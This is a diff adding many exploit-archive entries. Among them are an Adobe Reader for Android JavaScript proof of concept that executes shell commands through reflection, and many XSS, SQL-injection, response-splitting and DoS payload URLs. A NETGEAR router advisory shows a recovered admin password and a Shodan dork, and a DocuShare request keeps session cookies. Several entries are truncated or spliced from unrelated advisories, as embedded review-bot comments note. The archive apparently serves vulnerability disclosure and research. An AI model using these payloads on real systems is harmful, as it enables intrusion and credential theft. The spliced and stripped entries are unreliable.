+Introduction
+------------------------------------------------------------------------
+Adobe Reader for Android allows users to work with PDF documents on an
+Android tablet or phone. According to Google Play, the app is installed
+on 100 million to 500 million devices.
+
+The following classes expose one or more Javascript interfaces:
+
+- ARJavaScript
+- ARCloudPrintActivity
+- ARCreatePDFWebView
+
+The app targets API Level 10, which renders the exposed Javascript
+interfaces vulnerable to code execution - provided that an attacker
+manages to run malicious Javascript code within Adobe Reader.
+
+------------------------------------------------------------------------
+PDF Javascript APIs
+------------------------------------------------------------------------
+It appears that Adobe Reader for Mobile supports [4] a subset of the
+Javascript for Acrobat APIs. For some reason the exposed Javscript
+objects are prefixed with an underscore character.
+
+public class ARJavaScript
+{
+[...]
+
+ public ARJavaScript(ARViewerActivity paramARViewerActivity)
+ {
+[...]
+ this.mWebView.addJavascriptInterface(new
+ARJavaScriptInterface(this),
+"_adobereader");
+ this.mWebView.addJavascriptInterface(new
+ARJavaScriptApp(this.mContext), "_app");
+ this.mWebView.addJavascriptInterface(new ARJavaScriptDoc(),
+"_doc");
+ this.mWebView.addJavascriptInterface(new
+ARJavaScriptEScriptString(this.mContext), "_escriptString");
+ this.mWebView.addJavascriptInterface(new ARJavaScriptEvent(),
+"_event");
+ this.mWebView.addJavascriptInterface(new ARJavaScriptField(),
+"_field");
+ this.mWebView.setWebViewClient(new ARJavaScript.1(this));
+this.mWebView.loadUrl("file:///android_asset/javascript/index.html");
+ }
+
+An attacker can create a specially crafted PDF file containing
+Javascript that runs when the target user views (or interacts with)
+this PDF file. Using any of the Javascript objects listed above
+provides the attacker access to the public Reflection APIs inherited
+from Object. These APIs can be abused to run arbitrary Java code.
+
+------------------------------------------------------------------------
+Proof of concept
+------------------------------------------------------------------------
+The following proof of concept [5] will create a text file in the app
+sandbox.
+
+function execute(bridge, cmd) {
+ return bridge.getClass().forName('java.lang.Runtime')
+ .getMethod('getRuntime',null).invoke(null,null).exec(cmd);
+}
+
+if(window._app) {
+ try {
+ var path = '/data/data/com.adobe.reader/mobilereader.poc.txt';
+ execute(window._app, ['/system/bin/sh','-c','echo \"Lorem
+ipsum\" > '
++ path]);
+ window._app.alert(path + ' created', 3);
+ } catch(e) {
+ window._app.alert(e, 0);
+ }
+}
+------------------------------------------------------------------------
+References
+------------------------------------------------------------------------
+[1]
+http://www.securify.nl/advisory/SFY20140401/adobe_reader_for_android_exposes_insecure_javascript_interfaces.html
+[2] https://play.google.com/store/apps/details?id=com.adobe.reader
+[3]
+http://developer.android.com/reference/android/webkit/JavascriptInterface.html
+[4]
+http://www.adobe.com/devnet-docs/acrobatetk/tools/Mobile/js.html#supported-javascript-apis
+[5] http://www.securify.nl/advisory/SFY20140401/mobilereader.poc.pdf
\ No newline at end of file
diff --git a/platforms/asp/webapps/32833.txt b/platforms/asp/webapps/32833.txt
new file mode 100755
index 000000000..4d4ca6799
--- /dev/null
+++ b/platforms/asp/webapps/32833.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/33957/info
+
+Blogsa is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Blogsa 1.0 Beta 3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/Widgets.aspx?w=Search&p=do&searchText=
\ No newline at end of file
diff --git a/platforms/asp/webapps/32874.txt b/platforms/asp/webapps/32874.txt
new file mode 100755
index 000000000..94968465f
--- /dev/null
+++ b/platforms/asp/webapps/32874.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/34227/info
+
+BlogEngine.NET is prone to a cross-site scripting vulnerability.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
+
+BlogEngine.NET 1.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/blog/search.aspx?q=">
\ No newline at end of file
diff --git a/platforms/asp/webapps/32882.txt b/platforms/asp/webapps/32882.txt
new file mode 100755
index 000000000..9c3b4e8b1
--- /dev/null
+++ b/platforms/asp/webapps/32882.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/34341/info
+
+SAP Business Objects Crystal Reports is prone to a cross-site scripting vulnerability.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
+
+NOTE: This issue may be related to the one described in BID 12107 (Business Objects Crystal Enterprise Report File Cross-Site Scripting Vulnerability). We will update or retire this BID when more information emerges.
+
+https://www.example.com/some/path/viewreport.asp?url=viewrpt.cwr?ID=7777"%0d%0awindow.alert%20"fsck_cissp^^INIT=actx:connect
\ No newline at end of file
diff --git a/platforms/asp/webapps/32888.txt b/platforms/asp/webapps/32888.txt
new file mode 100755
index 000000000..d73c885dc
--- /dev/null
+++ b/platforms/asp/webapps/32888.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/34349/info
+
+Asbru Web Content Management is prone to multiple SQL-injection vulnerabilities and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Asbru Web Content Management 6.5 and 6.6.9 are vulnerable; other versions may also be affected.
+
+http://www.example.com/page.asp?id=1
+http://www.example.com/page.asp?id=1 AND 1=2
+http://www.example.com/page.asp?id=1 AND 1=1
+http://www.example.com/webadmin/login.asp?url=">
+
diff --git a/platforms/asp/webapps/32898.txt b/platforms/asp/webapps/32898.txt
new file mode 100755
index 000000000..5eaf3ebfc
--- /dev/null
+++ b/platforms/asp/webapps/32898.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/34463/info
+
+Absolute Form Processor XE is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Absolute Form Processor XE 1.5 is vulnerable; other versions may also be affected.
+
+The following example input is available:
+
+username: ' or '1=1
\ No newline at end of file
diff --git a/platforms/asp/webapps/32903.txt b/platforms/asp/webapps/32903.txt
new file mode 100755
index 000000000..46ac05275
--- /dev/null
+++ b/platforms/asp/webapps/32903.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/34491/info
+
+People-Trak is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The following example data is available:
+
+username: ' or 1=(Select top 1 WAM_UserID from WebAppMgrs)--
\ No newline at end of file
diff --git a/platforms/cgi/webapps/32870.txt b/platforms/cgi/webapps/32870.txt
new file mode 100755
index 000000000..a89cf7145
--- /dev/null
+++ b/platforms/cgi/webapps/32870.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/34159/info
+
+AWStats is prone to a path-disclosure vulnerability.
+
+Exploiting this issue can allow an attacker to access sensitive data that may be used to launch further attacks against a vulnerable computer.
+
+The following are vulnerable:
+
+AWStats 6.5 (build 1.857) and prior
+WebGUI Runtime Environment 0.8.x and prior
+
+http://www.example.com/awstats/awstats.pl?config=HACKdestailleur.fr
\ No newline at end of file
diff --git a/platforms/cgi/webapps/32907.txt b/platforms/cgi/webapps/32907.txt
new file mode 100755
index 000000000..5e3b0660f
--- /dev/null
+++ b/platforms/cgi/webapps/32907.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/34507/info
+
+Banshee DAAP Extension is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
+
+DAAP Extension for Banshee 1.4.2 is vulnerable; other versions may also be affected.
+
+The following example URI is available:
+
+http://www.example.com:8089/[xss-here]
\ No newline at end of file
diff --git a/platforms/hardware/remote/32878.txt b/platforms/hardware/remote/32878.txt
new file mode 100755
index 000000000..cf7a00069
--- /dev/null
+++ b/platforms/hardware/remote/32878.txt
@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/34307/info
+
+Cisco ASA is prone to a cross-site scripting vulnerability.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
+
+Cisco ASA software versions 8.0.4(2B) and prior running on ASA 5500 Series Adaptive Security Appliances are vulnerable.
+
+POST /+webvpn+/index.html HTTP/1.1
+Host: "'> New bookmark .. and enter javascript:mimic_button('goto: 9096..') in the address field.
+
+2nd Method :
+The web console tool (CTRL + SHIFT + K), in which you can interpret javascript expressions in real time using the command line provided by the Web Console.
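Review bot: The PoC section of 32878.txt is truncated and appears to be spliced from another advisory: the `POST /+webvpn+/index.html` request breaks off at `Host: "'>` with the injected markup stripped, and the `2nd Method` paragraph about a browser web console does not describe Cisco ASA at all. The hunk header announces 26 added lines while the body holds about half that, which is consistent with tag-stripping having removed content on import. Restoring the request from the SecurityFocus source with markup escaped rather than removed would make the entry usable as a reference.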
diff --git a/platforms/hardware/webapps/32883.txt b/platforms/hardware/webapps/32883.txt
new file mode 100755
index 000000000..6cf1d21fd
--- /dev/null
+++ b/platforms/hardware/webapps/32883.txt
@@ -0,0 +1,105 @@
+Title: Multiple vulnerabilities in NETGEAR N600 WIRELESS DUAL BAND WNDR3400
+====================================================================================
+Notification Date: 4/14/2014
+Affected Vendor: NETGEAR N600 WIRELESS DUAL BAND WNDR3400
+Firmware Version: Firmware Version 1.0.0.38 AND BELOW (ALL versions affected)
+Issue Types: password Disclosure File Uploading with AuthPPOPE settings Change
+Discovered by: Santhosh Kumar twitter: @security_b0x
+Issue status: No Patch >From the Vendors.
+grettings: @Anami2111 (anamika singh) -- creator of wihawk
+
+
+
+====================================================================================
+Summary:
+========
+While i was lurking around the Netgear firmware today i came across various tweaking and others i was able to find a password disclosure,File uploading vulnerably which could compromise the entire router.as of now no patch from the vendor.
+
+Password Disclosure:
+====================
+url: server/unauth.cgi?id=393087602
+Generating with the 401 unauthorised error
+poc:
+Host: server:8080
+ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Referer: http://server:8080/
+ Connection: keep-alive
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 0
Router Password Recovered
+
+
+
+
+
+
You have successfully recovered the admin password.
You have successfully recovered the admin password.
+
+
+
Router Admin Username
+
admin
+
+
+
Router Admin Password
+
0514
+
+
+
You can now log in to the router using username "admin" and this recovered password.
+
+
+
+==============================================================================================================================
+
+Ppope account reset:
+
+Netgear runs a utility called "netgear genie" which does not have proper authentication on reaching "genie_pppoe.htm "
+
+which allows to reset the ppoe username which any basic authentication.
+
+http://server/genie_pppoe.htm
+
+==============================================================================================================================
+
+File Upload (router reset):
+
+like the same one above the "http://server/genie_restore.htm"
+
+the config file can be uploaded which leading to reseting the control to attackers username and password.
+
+*.cfg file.
+
+
+==============================================================================================================================
+SHODAN DORK:
+wndr3400: 10198 for wndr3400
+
+
+
+
+
+******************************************************************************************************************************
+
+
+
+
+
+
+
\ No newline at end of file
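Review bot: Eight lines of this hunk (from `Router Password Recovered` through `You can now log in to the router ...`) carry no `+` marker although the file is newly created, and the header announces 105 added lines while fewer are present, so the patch as stored will not apply cleanly; it looks like the HTML of the captured response page was stripped during import and took the markers with it. The `poc:` block also contains only request headers and no request line, so the `url:` line above it is the only record of what was actually sent. Re-importing the advisory from its source with markup escaped instead of removed would repair both.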
diff --git a/platforms/hardware/webapps/32886.txt b/platforms/hardware/webapps/32886.txt
new file mode 100755
index 000000000..26aabfcf3
--- /dev/null
+++ b/platforms/hardware/webapps/32886.txt
@@ -0,0 +1,127 @@
+The following request is vulnerable to a SQL injection in the last URI segment:
+
+GET /docushare/dsweb/ResultBackgroundJobMultiple/1 HTTP/1.1
+Host: 172.31.16.194:8080
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://172.31.16.194:8080/docushare/dsweb/DeleteConfirmation/1/Collection-14/Services
+Cookie: JSESSIONID=AB82A86859D9C65475DDE5E47216F1A0.tomcat1; AmberUser=64.980A91BBF9D661CB800C2CE5FCCE924AEF4D51CF0280B319873BC31AF0705F0F21.1svt4r2doj13hhu1dc7kf
+Connection: keep-alive
+
+
+Response (goodies):
+
+
+
+
+PoC: Vulnerable Source
+
+
+
+
+PoC Link:
+http://localhost:8808/files/%3E%22%3C[FILE INCLUDE VULNERABILITY!]%3E.pdf
+
+
+--- PoC Session Logs [POST] ---
+Injection via Wifi UI > Upload (iChm File Management)
+14:44:34.743[170ms][total 170ms] Status: 302[Found]
+POST http://192.168.2.104:8808/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html]
+ Request Header:
+ Host[192.168.2.104:8808]
+ User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
+ Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ Referer[http://192.168.2.104:8808/]
+ Connection[keep-alive]
+ POST-Daten:
+ POST_DATA[-----------------------------1145570518587
+Content-Disposition: form-data; name="newfile"; filename="%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY!].png"
+Content-Type: image/png
+
+Note: A local injection by usage of the app album name value is also possible via regular sync!
+
+
+--- PoC Session Logs [GET] ---
+Execution PDF Album (iChm File Management)
+14:43:20.010[836ms][total 1106ms] Status: 200[OK]
+GET http://192.168.2.104:8808/ Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[2773] Mime Type[application/x-unknown-content-type]
+ Request Header:
+ Host[192.168.2.104:8808]
+ User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
+ Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ Connection[keep-alive]
+ Cache-Control[max-age=0]
+ Response Header:
+ Accept-Ranges[bytes]
+ Content-Length[2773]
+ Date[Do., 10 Apr. 2014 12:54:15 GMT]
+
+
+14:43:20.874[48ms][total 48ms] Status: 200[OK]
+GET http://192.168.2.104:8808/jquery.js Load Flags[VALIDATE_ALWAYS ] Gr??e des Inhalts[55774] Mime Type[application/x-unknown-content-type]
+ Request Header:
+ Host[192.168.2.104:8808]
+ User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
+ Accept[*/*]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ Referer[http://192.168.2.104:8808/]
+ Connection[keep-alive]
+ Cache-Control[max-age=0]
+ Response Header:
+ Accept-Ranges[bytes]
+ Content-Length[55774]
+ Date[Do., 10 Apr. 2014 12:54:15 GMT]
+
+
+14:43:21.062[41ms][total 41ms] Status: 200[OK]
+GET http://192.168.2.104:8808/%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY!].*; Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[0] Mime Type[application/x-unknown-content-type]
+ Request Header:
+ Host[192.168.2.104:8808]
+ User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
+ Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ Referer[http://192.168.2.104:8808/]
+ Connection[keep-alive]
+ Response Header:
+ Accept-Ranges[bytes]
+ Content-Length[0]
+ Date[Do., 10 Apr. 2014 12:54:15 GMT]
+
+
+
+Reference(s):
+http://localhost:8808/files/
+http://localhost:8808/
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure parse and restriction of the vulnerable filename value in the upload POST method request.
+Encode and filter also the output name value for item list to prevent application-side executions and malicious injected context via POST method.
+
+
+Security Risk:
+==============
+The security risk of the local file include web vulnerability in the mobile application is estimated as high.
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
+Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
+profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
+states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
+may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
+or trade with fraud/stolen material.
+
+Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
+Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
+Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
+Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
+other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
+modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+ Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
+
+
+
+
+
+
+--
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
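Review bot: 32886.txt splices two unrelated advisories: it opens with a DocuShare `ResultBackgroundJobMultiple` SQL-injection request whose promised `Response (goodies):` section is empty, and from `PoC: Vulnerable Source` onward the text is a Vulnerability Laboratory advisory for a different product (a mobile file-management app on port 8808), so the second half does not belong here and the first half is incomplete. The DocuShare request also preserves a full `Cookie:` header with `JSESSIONID` and `AmberUser` values and an internal host address; session identifiers should be redacted before publication even if they have long expired. `Gr??e des Inhalts` in the session logs is a mis-encoded `Größe`, a further sign the text went through a lossy conversion.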
diff --git a/platforms/java/dos/32860.txt b/platforms/java/dos/32860.txt
new file mode 100755
index 000000000..3fa5122d7
--- /dev/null
+++ b/platforms/java/dos/32860.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/34150/info
+
+Sun Java System Calendar Server is prone to a denial-of-service vulnerability because it fails to handle certain duplicate URI requests.
+
+An attacker can exploit this issue to crash the Calendar Server, resulting in a denial-of-service condition.
+
+NOTE: Versions prior to Sun Java System Calendar Server 6.3 are not vulnerable.
+
+The following example data is available:
+
+https://www.example.com:3443/?tzid=crash
\ No newline at end of file
diff --git a/platforms/java/webapps/32818.txt b/platforms/java/webapps/32818.txt
new file mode 100755
index 000000000..f0e7bd38b
--- /dev/null
+++ b/platforms/java/webapps/32818.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/33912/info
+
+JOnAS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+JOnAS 4.10.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com:9000/jonasAdmin/ListMBeanDetails.do?select=jonas%3Aj2eeType%3DEJBModule%2Cj2eeType%3DEJBModule
\ No newline at end of file
diff --git a/platforms/java/webapps/32821.html b/platforms/java/webapps/32821.html
new file mode 100755
index 000000000..73f179456
--- /dev/null
+++ b/platforms/java/webapps/32821.html
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/33924/info
+
+APC PowerChute Network Shutdown is prone to an HTTP-response-splitting vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user, steal cookie-based authentication credentials, and influence how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.
+
+1 XSS: GET /security/applet?referrer=>"'> 2. Response Splitting Vulnerability found in script contexthelp. vulnerable parameter - "page" Example ******* GET /contexthelp?page=Foobar?%0d%0aDSECRG_HEADER:testvalue HTTP/1.0 response: HTTP/1.0 302 Moved temporarily Content-Length: 0 Date: ??~B, 25 ?~A?? 2008 10:47:42 GMT Server: Acme.Serve/v1.7 of 13nov96 Connection: close Expires: 0 Cache-Control: no-cache Content-type: text/html Location: help/english/Foobar? DSECRG_HEADER:testvalue Content-type: text/html
\ No newline at end of file
diff --git a/platforms/java/webapps/32858.txt b/platforms/java/webapps/32858.txt
new file mode 100755
index 000000000..49aadec73
--- /dev/null
+++ b/platforms/java/webapps/32858.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/34140/info
+
+Sun Java System Messenger Express is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Sun Java System Messenger Express 6.3-0.15 is vulnerable; other versions may also be affected.
+
+http://example.com/?user=admin&error= ">
\ No newline at end of file
diff --git a/platforms/java/webapps/32862.txt b/platforms/java/webapps/32862.txt
new file mode 100755
index 000000000..42c3ecbb0
--- /dev/null
+++ b/platforms/java/webapps/32862.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/34153/info
+
+Sun Java System Calendar Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+https://www.example.com:3443//command.shtml?view=overview&id=HK8CjQOkmbY&date=20081217T200734%27;alert('xss');//Z&caliad=someid@test.com&security=1
\ No newline at end of file
diff --git a/platforms/java/webapps/32863.txt b/platforms/java/webapps/32863.txt
new file mode 100755
index 000000000..cbacf1399
--- /dev/null
+++ b/platforms/java/webapps/32863.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/34154/info
+
+Sun Java System Communications Express is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+https://www.example.com/uwc/abs/search.xml?bookid=e11e46531a8a0&j_encoding=UTF-8&uiaction=quickaddcontact&entryid=&valueseparator=%3B&prefix=abperson_&stopalreadyselected=1&isselchanged=0&idstoadd=&selectedbookid=&type=abperson%2Cgroup&wcfg_groupview=&wcfg_searchmode=&stopsearch=1&expandgroup=&expandselectedgroup=&expandonmissing=&nextview=&bookid=e11e46531a8a0&actionbookid=e11e46531a8a0&searchid=7&filter=entry%2Fdisplayname%3D*&firstentry=0&sortby=%2Bentry%2Fdisplayname&curbookid=e11e46531a8a0&searchelem=0&searchby=contains&searchstring=Search+for&searchbookid=e11e46531a8a0&abperson_givenName=aa&abperson_sn=aa&abperson_piEmail1=a%40a.com&abperson_piEmail1Type=work&abperson_piPhone1=11&abperson_piPhone1Type=work&quickaddprefix=abperson_&abperson_displayName=%3Cscript%3Ealert%28%27xss2%27%29%3C%2Fscript%3E%2C+%3Cscript%3Ealert%28%27xss1%27%29%3C%2Fscript%3E&abperson_entrytype=abperson&abperson_memberOfPIBook=e11e46531a8a0
diff --git a/platforms/java/webapps/32864.txt b/platforms/java/webapps/32864.txt
new file mode 100755
index 000000000..7bfae404c
--- /dev/null
+++ b/platforms/java/webapps/32864.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/34155/info
+
+Sun Java System Communications Express is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+This issue is tracked by Sun Alert ID 258068.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+The following are vulnerable:
+
+Sun Java System Communications Express 6.3 for Sun Java Communications Suite 5 and 6
+Sun Java System Communications Express 6 2005Q4 (6.2)
+
+http://www.example.com/uwc/base/UWCMain?anon=true&calid=test@test.com&caltype=temporaryCalids&date=20081223T143836Z&category=All&viewctx=day&temporaryCalendars=test@test.com%27;alert(%27hello%27);a=%27
diff --git a/platforms/java/webapps/32897.txt b/platforms/java/webapps/32897.txt
new file mode 100755
index 000000000..6f796a214
--- /dev/null
+++ b/platforms/java/webapps/32897.txt
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/34454/info
+
+Cisco Subscriber Edge Services Manager is prone to a cross-site scripting vulnerability and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
+
+We don't know which versions of Subscriber Edge Services Manager are affected. We will update this BID as more information emerges.
+
+http://www.example.com/servlet/JavascriptProbe?prevURL=http%3A//host/servlet/JavascriptProbe%3FprevURL%3Dhttp%253A//host/&browser=explorer&version=6&javascript=1.3&
+getElementById=true&getElementTagName=true&documentElement=true&anchors=true®exp=true&option=true&all=true&cookie=true&images=true&layers=false&forms=
+true&links=true&frames=true&screen=%20true">"
+
+
+http://www.example.com/servlet/JavascriptProbe?prevURL=http%3A//host/servlet/JavascriptProbe%3FprevURL%3D%22%3E%3C&browser=explorer&version=6&javascript=1.3&getElem
+entById=true&getElementTagName=true&documentElement=true&anchors=true®exp=true&option=true&all=true&cookie=true&images=true&layers=false&forms=true&li
+nks=trueHTML
+Injection&frames=true&screen=true&
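Review bot: In both example URLs the query parameter `&regexp=true` has been decoded as the HTML entity `&reg` and stored as `®exp=true`, so the stored text no longer reproduces the source advisory. The URLs are also wrapped mid-token (`getElem` / `entById`, `li` / `nks=true`), which may or may not mirror the original formatting; re-exporting from the source without entity decoding would settle both.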
diff --git a/platforms/java/webapps/32909.txt b/platforms/java/webapps/32909.txt
new file mode 100755
index 000000000..df7fe078a
--- /dev/null
+++ b/platforms/java/webapps/32909.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/34531/info
+
+Novell Teaming is prone to a user-enumeration weakness and multiple cross-site scripting vulnerabilities.
+
+A remote attacker can exploit the user-enumeration weakness to enumerate valid usernames and then perform brute-force attacks; other attacks are also possible.
+
+The attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Novell Teaming 1.0.3 is vulnerable; other versions may also be affected.
+
+https://www.example.com/web/guest/home?p_p_id=82&p_p_action=1&p_p_state=%3Cscript%3Ealert('xss+vulnerability')%3C/script%3E&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=1&p_p_col_count=2&_82_struts_action=%2Flanguage%2Fview&_82_languageId=de_DE
\ No newline at end of file
diff --git a/platforms/linux/dos/32775.txt b/platforms/linux/dos/32775.txt
new file mode 100755
index 000000000..e06a4e240
--- /dev/null
+++ b/platforms/linux/dos/32775.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/33618/info
+
+The Linux kernel is prone to a local denial-of-service vulnerability because it fails to properly handle malformed filesystem images.
+
+Attackers can exploit this issue to cause the kernel to crash, denying service to legitimate users. Note that to exploit this issue, attackers must be able to mount appropriate filesystem types, which may require membership in a privileged group or root access.
+
+This issue affects versions prior to Linux kernel 2.6.27.14.
+
+http://www.exploit-db.com/sploits/32775.gz
\ No newline at end of file
diff --git a/platforms/linux/dos/32800.txt b/platforms/linux/dos/32800.txt
new file mode 100755
index 000000000..0d113811e
--- /dev/null
+++ b/platforms/linux/dos/32800.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/33749/info
+
+Poppler is prone to multiple denial-of-service vulnerabilities when handling malformed PDF files.
+
+Successfully exploiting this issue allows remote attackers to crash applications that use the vulnerable library, denying service to legitimate users.
+
+These issues affect versions prior to Poppler 0.10.4.
+
+http://www.exploit-db.com/sploits/32800.pdf
\ No newline at end of file
diff --git a/platforms/linux/dos/32838.txt b/platforms/linux/dos/32838.txt
new file mode 100755
index 000000000..64f8a06a4
--- /dev/null
+++ b/platforms/linux/dos/32838.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/33972/info
+
+MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain XPath expressions.
+
+An attacker can exploit this issue to crash the application, denying access to legitimate users.
+
+This issue affects:
+
